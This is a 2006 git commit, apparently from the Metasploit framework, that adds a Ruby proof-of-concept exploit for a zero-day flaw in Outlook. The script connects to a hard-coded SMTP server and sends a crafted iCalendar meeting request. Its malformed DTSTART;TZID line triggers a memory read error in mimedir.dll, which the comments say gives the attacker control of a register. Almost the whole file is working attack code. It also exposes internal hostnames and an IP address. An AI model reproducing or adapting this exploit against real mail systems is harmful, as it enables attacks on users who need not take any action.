Add PoC for no-user-action-necessary Outlook vuln - 0day

git-svn-id: file:///home/svn/framework3/trunk@3725 4d416f70-5f16-0410-b530-b9f4589650da
2006-06-23 19:03:09 +00:00 · 2006-06-23 19:03:09 +00:00 · 4e99e7aafb
parent 29389ad2dc
commit 4e99e7aafb
1 changed files with 133 additions and 0 deletions
--- a/modules/exploits/private/killahbee_outlook.rb
+++ b/modules/exploits/private/killahbee_outlook.rb
@ -0,0 +1,133 @@
+#!/usr/bin/env ruby
+
+#
+#   Important section: 
+#
+#   BEGIN:VEVENT
+#       DTSTAMP:20060509T194627Z
+#       DTSTART;TZID:20060509T150000
+#   END:VEVENT
+#
+#   the DTSTART;TZID line requires the following form to be valid:
+#       DTSTART;TZID="timezone info goes here":<time>
+#
+#   without the ="" it'll produce a read error in mimedir.dll @ 354dc00d
+#       mov eax, [eax + ecx + 0x8]   <-- we control ecx
+#
+#   Probably other possible crashes - still working.
+#
+#       ~ Puss
+#
+
+$:.unshift('~/src/framework3/trunk/lib')
+
+require 'rex'
+s = Rex::Socket.create_tcp(
+	'PeerHost' => '10.4.10.190',
+	'PeerPort' => 25
+)
+
+puts s.get_once
+
+s.write("EHLO X\r\n")
+puts s.get_once
+
+s.write("MAIL FROM: bar@EXCHNG.sfeng.sourcefire.com\r\n")
+puts s.get_once
+
+s.write("RCPT TO: foo@EXCHNG.sfeng.sourcefire.com\r\n")
+puts s.get_once
+
+s.write("DATA\r\n")
+puts s.get_once
+
+bsize = 32768
+x = 
+%Q[	From: bar@EXCHNG.sfeng.sourcefire.com
+	To: foo@EXCHNG.sfeng.sourcefire.com
+	Subject: iCal Exploit
+	Content-class: urn:content-classes:calendarmessage
+	MIME-Version: 1.0	
+	Content-Type: multipart/alternative;boundary="01BD3665.3AF0D360"
+	X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0
+
+	--01BD3665.3AF0D360
+	Content-Type: text/plain; charset="UTF-8"
+	Content-Transfer-Encoding: base64
+
+	VHlwZTpTaW5nbGUgTWVldGluZw0KT3JnYW5pemVyOkhEIE1vb3JlDQpTdGFydCBUaW1lOlR1ZXNk
+	YXksIE1heSAwOSwgMjAwNiAzOjAwIFBNDQpFbmQgVGltZTpUdWVzZGF5LCBNYXkgMDksIDIwMDYg
+	MzozMCBQTQ0KVGltZSBab25lOihHTVQtMDY6MDApIENlbnRyYWwgVGltZSAoVVMgJiBDYW5hZGEp
+	DQpMb2NhdGlvbjpib2FyZCByb29tDQoNCip+Kn4qfip+Kn4qfip+Kn4qfioNCg0KDQpUaGlzIGlz
+	IGEgdGVzdA0KDQpNaWNyb3NvZnQgT3V0bG9vayBXZWIgQWNjZXNzOg0KaHR0cDovL01BSUwvRXhj
+	aGFuZ2UvaGRtb29yZS9JbmJveC90ZXN0LTIuRU1MP2NtZD1vcGVuDQoNCg==	
+	
+	--01BD3665.3AF0D360
+	Content-Type: text/html; charset="UTF-8"
+	Content-Transfer-Encoding: base64
+
+	PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDMuMi8vRU4iPg0KPEhUTUw+
+	DQo8SEVBRD4NCjxNRVRBIEhUVFAtRVFVSVY9IkNvbnRlbnQtVHlwZSIgQ09OVEVOVD0idGV4dC9o
+	dG1sOyBjaGFyc2V0PXV0Zi04Ij4NCjxNRVRBIE5BTUU9IkdlbmVyYXRvciIgQ09OVEVOVD0iTVMg
+	RXhjaGFuZ2UgU2VydmVyIHZlcnNpb24gNi41LjcyMjYuMCI+DQo8VElUTEU+dGVzdDwvVElUTEU+
+	DQo8L0hFQUQ+DQo8Qk9EWT4NCjwhLS0gQ29udmVydGVkIGZyb20gdGV4dC9wbGFpbiBmb3JtYXQg
+	LS0+DQoNCjxQPjxGT05UIFNJWkU9Mj5UeXBlOlNpbmdsZSBNZWV0aW5nPEJSPg0KT3JnYW5pemVy
+	OkhEIE1vb3JlPEJSPg0KU3RhcnQgVGltZTpUdWVzZGF5LCBNYXkgMDksIDIwMDYgMzowMCBQTTxC
+	Uj4NCkVuZCBUaW1lOlR1ZXNkYXksIE1heSAwOSwgMjAwNiAzOjMwIFBNPEJSPg0KVGltZSBab25l
+	OihHTVQtMDY6MDApIENlbnRyYWwgVGltZSAoVVMgJmFtcDsgQ2FuYWRhKTxCUj4NCkxvY2F0aW9u
+	OmJvYXJkIHJvb208QlI+DQo8QlI+DQoqfip+Kn4qfip+Kn4qfip+Kn4qPEJSPg0KPEJSPg0KPEJS
+	Pg0KVGhpcyBpcyBhIHRlc3Q8QlI+DQo8L0ZPTlQ+DQo8L1A+DQo8UD5NaWNyb3NvZnQgT3V0bG9v
+	ayBXZWIgQWNjZXNzOiA8QSBIUkVGPSJodHRwOi8vTUFJTC9FeGNoYW5nZS9oZG1vb3JlL0luYm94
+	L3Rlc3QtMi5FTUw/Y21kPW9wZW4iPmh0dHA6Ly9NQUlML0V4Y2hhbmdlL2hkbW9vcmUvSW5ib3gv
+	dGVzdC0yLkVNTD9jbWQ9b3BlbjwvQT48L1A+DQo8L0JPRFk+DQo8L0hUTUw+
+
+	--01BD3665.3AF0D360	
+	Content-class: urn:content-classes:calendarmessage
+	Content-Type: text/calendar; method=REQUEST; name="meeting.ics"
+	Content-Transfer-Encoding: 8bit
+
+BEGIN:VCALENDAR
+	METHOD:REQUEST
+	PRODID:Microsoft CDO for Microsoft Exchange
+	VERSION:2.0
+	
+	BEGIN:VTIMEZONE
+		TZID:(GMT-06.00) Central Time (US & Canada)
+		X-MICROSOFT-CDO-TZID:11
+	
+		BEGIN:STANDARD
+			DTSTART:16010101T020000
+			TZOFFSETFROM:-0500
+			TZOFFSETTO:-0600
+			RRULE:FREQ=YEARLY;WKST=MO;INTERVAL=1;BYMONTH=10;BYDAY=-1SU
+		END:STANDARD
+	
+		BEGIN:DAYLIGHT
+			DTSTART:16010101T020000
+			TZOFFSETFROM:-0600
+			TZOFFSETTO:-0500
+			RRULE:FREQ=YEARLY;WKST=MO;INTERVAL=1;BYMONTH=4;BYDAY=1SU
+		END:DAYLIGHT
+		
+	END:VTIMEZONE
+
+	BEGIN:VEVENT
+		DTSTAMP:20060509T194627Z
+		DTSTART;TZID:20060509T150000
+	END:VEVENT
+	
+END:VCALENDAR
+	
+	--01BD3665.3AF0D360
+]
+
+x.each_line do |line|
+	line.strip!
+	s.write(line + "\r\n")
+end
+
+s.write(".\r\n")
+puts s.get_once
+
+s.write("QUIT\r\n")
+puts s.get_once